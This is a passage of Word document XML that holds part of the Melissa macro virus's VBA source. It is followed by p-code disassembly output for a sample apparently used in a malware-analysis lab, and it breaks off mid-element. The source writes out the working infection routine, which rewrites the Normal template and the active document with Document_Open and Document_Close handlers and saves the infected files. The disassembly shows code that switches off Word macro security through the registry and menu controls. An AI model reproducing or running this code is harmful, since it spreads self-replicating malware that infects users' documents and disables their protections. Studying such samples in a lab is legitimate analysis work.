    </w:p>
    <w:p w14:paraId="2BD9C863" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">         BreakUmOffASlice.Send</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE95661" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">         Peep = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA3ADF6" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">    Next y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6855B7B1" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>DasMapiName.Logoff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B74EEEC" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>End If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFEA39C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D76347" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>End If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000858D6" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B44CC81" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796644A2" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>NTCL = NTI1.CodeModule.CountOfLines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6363E52C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>ADCL = ADI1.CodeModule.CountOfLines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5BBF99" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>BGN = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD218A9" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>If ADI1.Name &lt;&gt; "Melissa" Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2309018F" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>If ADCL &gt; 0 Then _</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8D8FA9" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>ADI1.CodeModule.DeleteLines 1, ADCL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CD0F86" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>Set ToInfect = ADI1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D96C50" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>ADI1.Name = "Melissa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011CEA72" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>DoAD = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5ABF6D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>End If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6E924A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>If NTI1.Name &lt;&gt; "Melissa" Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EEF016" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>If NTCL &gt; 0 Then _</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7D2F3E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>NTI1.CodeModule.DeleteLines 1, NTCL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8A40A7" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>Set ToInfect = NTI1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DF2C6C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>NTI1.Name = "Melissa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB7F87B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>DoNT = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C4914E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>End If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31071250" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>If DoNT &lt;&gt; True And DoAD &lt;&gt; True Then GoTo CYA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77564AA5" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>If DoNT = True Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447A9600" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>Do While ADI1.CodeModule.Lines(1, 1) = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD953CB" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>ADI1.CodeModule.DeleteLines 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05706BC4" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E2E996" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5027FFD9" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>Do While ADI1.CodeModule.Lines(BGN, 1) &lt;&gt; ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298F184D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A40E19" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>BGN = BGN + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBDC3E7" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34114145" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>End If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1501D16E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>If DoAD = True Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CC28E1" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>Do While NTI1.CodeModule.Lines(1, 1) = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1048F0E5" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>NTI1.CodeModule.DeleteLines 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594E3AAA" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292D6274" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D26B5AF" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>Do While NTI1.CodeModule.Lines(BGN, 1) &lt;&gt; ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6114E798" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A059712" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>BGN = BGN + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43817A1C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593665A7" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>End If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E69D93" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>CYA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2837C514" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>If NTCL &lt;&gt; 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E905E56" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>ActiveDocument.SaveAs FileName:=ActiveDocument.FullName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038013CA" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>ElseIf (InStr(1, ActiveDocument.Name, "Document") &lt;&gt; False) Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6383DA50" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>ActiveDocument.Saved = True: End If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545B162A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>'WORD/Melissa written by Kwyjibo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456E20B3" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>'Works in both Word 2000 and Word 97</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE94BE5" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D115401" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>'Word -&gt; Email | Word 97 &lt;--&gt; Word 2000 ... it's a new age!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD06C99" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta here."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E3194E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>End Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4E7238" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47"/>
    <w:p w14:paraId="3580A09E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>-------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229E91CF" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">VBA MACRO VBA_P-code.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384C85D2" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>in file: VBA P-code - OLE stream: 'VBA P-code'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB69809" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F38DCC" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Processing file: sample_lab6_18_sep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F93C6F8" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' ===============================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3344D550" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Module streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B820E5" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Macros/VBA/Melissa - 6327 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD2F24C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A5FFE2" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>FuncDefn (Private Sub Document_Open())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72567CBB" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFC06E5" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">OnError (Resume Next) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A16DDD" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190075B4" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B039A1" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209FBB05" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0005 "Level"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD66704" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld System </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3AC0C4" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd PrivateProfileString 0x0003 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0227E0" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C07BD8" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735BBB2C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">IfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21287F8C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B1E6EB" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F47CAB" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x000B "Security..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465F87E8" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0005 "Macro"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EDBCAD" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsLd CommandBars 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106C1A2F" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Controls 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E352EAE" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt Enabled </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794C8620" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C26D51" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI4 0x0001 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E88149" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0000 ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB4A497" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1AEAE2" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0005 "Level"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B19227" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld System </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4540C8E5" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemSt PrivateProfileString 0x0003 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6167D427" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6742C9A3" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ElseBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083E5A85" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B234DCC" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746C6EC3" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0005 "Macro"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE21F01" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0005 "Tools"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CC666B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsLd CommandBars 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1381F6DB" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemLd Controls 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE7FD2E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt Enabled </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE8D4CF" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #7:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3838CFDB" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768AE969" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A294DB7" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Sub </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9746F7" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
